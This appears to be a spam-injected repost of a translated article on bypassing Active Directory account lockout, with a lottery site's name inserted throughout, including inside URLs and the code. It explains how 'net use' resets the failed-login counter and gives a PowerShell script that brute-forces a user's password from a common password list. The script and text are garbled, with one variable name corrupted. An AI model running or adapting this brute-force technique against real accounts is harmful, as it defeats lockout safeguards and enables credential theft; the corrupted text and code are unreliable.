0717-7821348
欢乐彩票3539

欢乐彩票3539

您现在的位置: 首页 > 欢乐彩票3539
欢乐彩票3539-怎么绕过域账户登录失利次数的约束
2019-05-11 22:36:05

这篇文章仅出于教育意图,请勿在不属于你的核算机上进行安全测验。

从日常攻防视点来看,一旦攻击者经过网络垂钓或许长途代码履行等缝隙获得了受害者的核算机权限后,一般是以服务或用户的身份存在于核算机中。此刻,他们往往会面对这样一个问题,尽管有权限,但却不知道暗码。

获取暗码的办法有很多种,例如运用Mimikatz以及查找一些机器上的灵敏文件来进行估测。而这篇文章我将介绍一种陈旧的办法,暴力破解,主要以某个用户为方针。可是,微软对帐户的登录测验是有过错次数约束的。所以要顺利进行暴力破解,需求绕过这个约束。而我发现,在现已过身份验证的情况下,只需运转net use \\%computername% /u:%username%,就能从头进行身份验证并重置过错测验的次数。

想更详细的了解此欢乐彩票3539-怎么绕过域账户登录失利次数的约束操作,可从Microsoft下载长途服务器管理工​​具:https://www.microsoft.com/en-us/download/details.aspx?id=45520

装置该东西后,你能够运转以下powershell指令,它会显现我的JoeUser帐户的当时过错测验次数。

get-aduser -filter * -prop lastbadpasswordattempt, badpwdcount, lockedout | select name, lastbadpasswordattempt, badpwdcount,lockedout | format-table -auto

在我的本地战略中,你能够看到我设置在3次无效登录后确定帐户(这也是Microsoft的默认值)。

现在我成心输入过错的暗码,让机器记录下这个过错的暗码测验。所运用的指令为net use \\%computername% “FakePassword” /u:joeuser。 出于某种原因,我能够看到两次过错的暗码测验,我还有另一种办法,能够看到只要一次过错的暗码测验,当然这无关大雅。

现在,我运用上述提欢乐彩票3539-怎么绕过域账户登录失利次数的约束及的指令铲除过错的暗码测验次数Net use \\%computername% /u:%username%。我们能够看到,此刻我的指令中欢乐彩票3539-怎么绕过域账户登录失利次数的约束并没有暗码。在我已具有某用户的权限下,我可随意铲除过错的暗码测验次数!

现在,我能够运用这种技能无约束地破解暗码。仅有的问题是假如你想用Net use破解暗码,我必须在每次运用重置指令后删去同享。例如,现在我现已进行了同享设置,假如我测验破解暗码,就会收到如下音讯:

为了铲除同享,只能运用Net Use /Delete \\%computername%

以下是一个PoC。我运用Daniel Miesslers SecLists中前10000名暗码组成字典,去测验破解。我把我的代码和字典放在了C:\Users\Public目录下,详细如下:

$userVar = Get-ChildItem env:username
$uname = $userVar.Value
$computerVar = Get-ChildItem env:computername
$computerName = $computerVar.Value
$ErrorActionPreference欢乐彩票3539-怎么绕过域账户登录失利次数的约束 = “Stop”
$hooray = “PasswordNotFoun”
$CurrentPath = “C:\Users\Public”
$FileName = “10-million-password-list-top-10000.txt”
$FName= “$CurrentPath\$FileName”
foreach($value in [System.IO.File]::ReadLines($Fname))
{
$passAttempt = (‘net use \\’ + $computerName + ‘ “‘ + $value + ‘“ ‘ + ‘/u:’ + $uname )
try
{
Write-Output (“trying password “ + $value)
$output = Invoke-expression $passAttempt | Out-Null
$hooray = $value
write-output (“FOUND the user password: “ + $value)
$reset = (‘net use \\’ + $computername + ‘ /u:’ + $uname )
Invoke-expression $reset | Out-Null
$deleteShare = (‘net use /delete \\’ + $computername )
Invoke-expression $deleteSwearadayhare | Out-Null
break
}
catch
{
$reset = (‘net use \\’ + $computername + ‘ /u:’ + $uname )
Invoke-expression $reset | Out-Null
$deleteShare = (‘net use /delete \\’ + $computername )
Invoke-expression $deleteShare | Out-Null
}
}
write-host “The Password is: “ $hooray

我的脚本正在破解用户暗码。

是的,被破解帐户地过错暗码测验次数一直是0!

尽管不快但很有用。在我发现这个问题后,我将此作为一个缝隙提交给Microsoft,但他们不认为这是一个安全缝隙(至少这对我来说是一个缝隙)。

请随时在Twitter上重视我@_markmo_,我将随时共享我学到的常识。

本文由白帽汇收拾并翻译,不代表达帽汇任何观念和态度

来历:h欢乐彩票3539-怎么绕过域账户登录失利次数的约束ttps://nosec.org/home/detail/2510.html

原文:https://medium.com/@markmotig/bypassing-ad-account-lockout-for-a-compromised-account-5c908d663de8

白帽汇从事信息安全,专心于安全大数据、企业要挟情报。

公司产品:FOFA-网络空间安全查找引擎、FOEYE-网络空间检索系统、NOSEC-安全消息渠道。

为您供给:网络空间测绘、企业财物搜集、企业要挟情报、应急呼应服务。